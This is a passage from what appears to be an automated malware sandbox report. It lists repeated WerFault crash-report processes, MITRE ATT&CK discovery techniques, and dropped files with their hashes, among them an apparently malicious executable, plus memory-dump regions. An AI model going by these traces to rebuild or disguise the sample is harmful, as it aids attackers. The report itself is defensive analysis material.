1⤵
PID:1416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4928 -ip 4928
1⤵
PID:3376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4928 -ip 4928
1⤵
PID:3516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 4928 -ip 4928
1⤵
PID:3504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 4928 -ip 4928
1⤵
PID:1616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 4928 -ip 4928
1⤵
PID:3480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 4928 -ip 4928
1⤵
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 4928 -ip 4928
1⤵
PID:324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 4928 -ip 4928
1⤵
PID:3492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 4928 -ip 4928
1⤵
PID:3896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 4928 -ip 4928
1⤵
PID:1652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 4928 -ip 4928
1⤵
PID:3232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 844 -p 4928 -ip 4928
1⤵
PID:4912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 852 -p 4928 -ip 4928
1⤵
PID:2464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 4928 -ip 4928
1⤵
PID:2168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 856 -p 4928 -ip 4928
1⤵
PID:2752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 880 -p 4928 -ip 4928
1⤵
PID:4628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 908 -p 4928 -ip 4928
1⤵
PID:4576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 912 -p 4928 -ip 4928
1⤵
PID:2668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 948 -p 4928 -ip 4928
1⤵
PID:368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 916 -p 4928 -ip 4928
1⤵
PID:4108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 944 -p 4928 -ip 4928
1⤵
PID:3220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 940 -p 4928 -ip 4928
1⤵
PID:3016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 964 -p 4928 -ip 4928
1⤵
PID:3128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 964 -p 4928 -ip 4928
1⤵
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 964 -p 4928 -ip 4928
1⤵
PID:3880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 996 -p 4928 -ip 4928
1⤵
PID:4608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 1020 -p 4928 -ip 4928
1⤵
PID:2660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 972 -p 4928 -ip 4928
1⤵
PID:1832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 980 -p 4928 -ip 4928
1⤵
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 1016 -p 4928 -ip 4928
1⤵
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 976 -p 4928 -ip 4928
1⤵
PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 1020 -p 4928 -ip 4928
1⤵
PID:1032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 976 -p 4928 -ip 4928
1⤵
PID:3568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 1016 -p 4928 -ip 4928
1⤵
PID:2484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 1000 -p 4928 -ip 4928
1⤵
PID:1908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 1000 -p 4928 -ip 4928
1⤵
PID:832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 1020 -p 4928 -ip 4928
1⤵
PID:1988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 1000 -p 4928 -ip 4928
1⤵
PID:3560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 984 -p 4928 -ip 4928
1⤵
PID:3576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 1020 -p 4928 -ip 4928
1⤵
PID:3636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 984 -p 4928 -ip 4928
1⤵
PID:2936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 1004 -p 4928 -ip 4928
1⤵
PID:3768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 968 -p 4928 -ip 4928
1⤵
PID:1284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 1008 -p 4928 -ip 4928
1⤵
PID:2408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 984 -p 4928 -ip 4928
1⤵
PID:4384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4928 -ip 4928
1⤵
PID:3244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 936 -p 4928 -ip 4928
1⤵
PID:3556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 1004 -p 4928 -ip 4928
1⤵
PID:4884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESCA93.tmp

Filesize
1KB

MD5
e864d2243750f9bd9eb83defd8730005

SHA1
32e9c4788b663432e5caf8463fad8c77d768531c

SHA256
1c1e32539025fe86fe50749355900f44378aa95bde6e2d0b4758790cf07892ec

SHA512
5a99087356d80b33ae8684790d82e396f24fb9f29166ea4439a365f507a05f47e4535e36de98d7d51c5c1a1365d0ff914b89172dcf30ea0fe501c378e705a175

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cdnfj4ia.tge.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hgrkcgog\hgrkcgog.dll

Filesize
3KB

MD5
0ee3b3f51c8426524260af053a963066

SHA1
6fed3645eaf70360ac2cd7e8992571de239b4f52

SHA256
d9f6901b448050cd02c167fbd677f8d8c7333e51589837f49d8e0d030156dbc3

SHA512
14334c22622defe06bf691c2cfa5b1b8552a5c8b395daa9ff1af28b43f378f550a768933efd04e4b63fd72a5fa61a1c140c27d94d610ef4e4b158ac5d25eb861

Download Submit
C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe

Filesize
528KB

MD5
a2d03c5333bfecca62720cd6ee3a4dc4

SHA1
ce4c380f2748f375904c17b38d4f93e294fef4f6

SHA256
ef8ec5181ab4cf85a5c4867089594f40900eaafb514496905eb86314c460178e

SHA512
5c9db8bb415da332c0adc24519ae0410a65aba932de15a682ce57efbc61b8b7d7e5e3548164909a5da5bc6966c351528626655fdbb7c21f3b4fd1974406ae04c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hgrkcgog\CSCC92F1342238240C8AFE84F3EE2AAB363.TMP

Filesize
652B

MD5
aa452a82d5dca5b0daf46abd67e082f3

SHA1
679a3a0072a4d0513727ed42de3dd175ffb394f5

SHA256
6cc0f06cf8e914c27e227500d6121f64e25011cf8dd8348bd65669e17492bc74

SHA512
f8242b8ea19ffb805dead77d49a5e247084d12b44f4f7c7d40f240198c232d85733d126485a26de08f941f4fcb4634cb9b94b0f07bd4968380c9766a46394592

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hgrkcgog\hgrkcgog.0.cs

Filesize
478B

MD5
80c03b4485808d996cc8226157f377a7

SHA1
7cc7e02b84232b1523c555a349c86fc059a98eff

SHA256
240b4ca770e75d02c83cb17844897b66b8c671c1477654d797146a19e0bcf12d

SHA512
ee72fd6d3ec1d6a3645c59c72a7816bcf6cf34b04683a2611eedb1897d5781c7fb92bdb1d295671b2c107a2008100e8ab1010a7401bd6c651bfed2219f15656c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hgrkcgog\hgrkcgog.cmdline

Filesize
369B

MD5
b96d0082f63e562482103dc28f5d1704

SHA1
9556f564463911742590550b26b79fcb15d774c6

SHA256
02e95ee4b46d18edeb88ac7f1131936163e1cb4d005a601d8a3dca0d2f2c32fa

SHA512
30e78411a32882840dfea6e34f44dc9899ff71251f90f84613136010a4361445e4a69a19d31a909b570359351e2be6df1c6c49ca9e4d936e3db4b8cf5c66b6f5

Download Submit
memory/4576-39-0x0000000007A70000-0x0000000007B06000-memory.dmp

Filesize
600KB

Download
memory/4576-42-0x0000000007A10000-0x0000000007A24000-memory.dmp

Filesize
80KB

Download
memory/4576-4-0x00000000054D0000-0x00000000054F2000-memory.dmp

Filesize
136KB

Download
memory/4576-5-0x0000000005DB0000-0x0000000005E16000-memory.dmp

Filesize
408KB

Download
memory/4576-6-0x0000000005E20000-0x0000000005E86000-memory.dmp

Filesize
408KB

Download
memory/4576-16-0x0000000005E90000-0x00000000061E4000-memory.dmp

Filesize
3.3MB

Download
memory/4576-17-0x0000000006490000-0x00000000064AE000-memory.dmp

Filesize
120KB

Download
memory/4576-18-0x00000000064D0000-0x000000000651C000-memory.dmp

Filesize
304KB

Download
memory/4576-19-0x0000000006A40000-0x0000000006A72000-memory.dmp

Filesize
200KB

Download
memory/4576-20-0x000000006E1B0000-0x000000006E1FC000-memory.dmp

Filesize
304KB

Download
memory/4576-22-0x000000006E320000-0x000000006E674000-memory.dmp

Filesize
3.3MB

Download
memory/4576-21-0x00000000718F0000-0x00000000720A0000-memory.dmp

Filesize
7.7MB

Download
memory/4576-32-0x0000000007670000-0x000000000768E000-memory.dmp

Filesize
120KB

Download
memory/4576-33-0x0000000007750000-0x00000000077F3000-memory.dmp

Filesize
652KB

Download
memory/4576-34-0x00000000718F0000-0x00000000720A0000-memory.dmp

Filesize
7.7MB

Download
memory/4576-35-0x00000000718F0000-0x00000000720A0000-memory.dmp

Filesize
7.7MB

Download
memory/4576-37-0x0000000007710000-0x000000000772A000-memory.dmp

Filesize
104KB

Download
memory/4576-36-0x0000000007E80000-0x00000000084FA000-memory.dmp

Filesize
6.5MB

Download
memory/4576-38-0x0000000007850000-0x000000000785A000-memory.dmp

Filesize
40KB

Download
memory/4576-3-0x0000000005590000-0x0000000005BB8000-memory.dmp

Filesize
6.2MB

Download
memory/4576-40-0x00000000079D0000-0x00000000079E1000-memory.dmp

Filesize
68KB

Download
memory/4576-1-0x0000000004EC0000-0x0000000004EF6000-memory.dmp

Filesize
216KB

Download
memory/4576-41-0x0000000007A00000-0x0000000007A0E000-memory.dmp

Filesize
56KB

Download
memory/4576-2-0x00000000718F0000-0x00000000720A0000-memory.dmp

Filesize
7.7MB

Download
memory/4576-43-0x0000000007A50000-0x0000000007A6A000-memory.dmp

Filesize
104KB

Download
memory/4576-44-0x0000000007A40000-0x0000000007A48000-memory.dmp

Filesize
32KB

Download
memory/4576-57-0x0000000007A40000-0x0000000007A48000-memory.dmp

Filesize
32KB

Download
memory/4576-63-0x00000000718FE000-0x00000000718FF000-memory.dmp

Filesize
4KB

Download
memory/4576-64-0x00000000718F0000-0x00000000720A0000-memory.dmp

Filesize
7.7MB

Download
memory/4576-65-0x00000000718F0000-0x00000000720A0000-memory.dmp

Filesize
7.7MB

Download
memory/4576-0-0x00000000718FE000-0x00000000718FF000-memory.dmp

Filesize
4KB

Download
memory/4576-73-0x00000000718F0000-0x00000000720A0000-memory.dmp

Filesize
7.7MB

Download
memory/4928-80-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/4928-75-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/4928-76-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/4928-77-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/4928-78-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/4928-79-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/4928-74-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/4928-81-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/4928-82-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/4928-83-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/4928-84-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/4928-85-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/4928-86-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download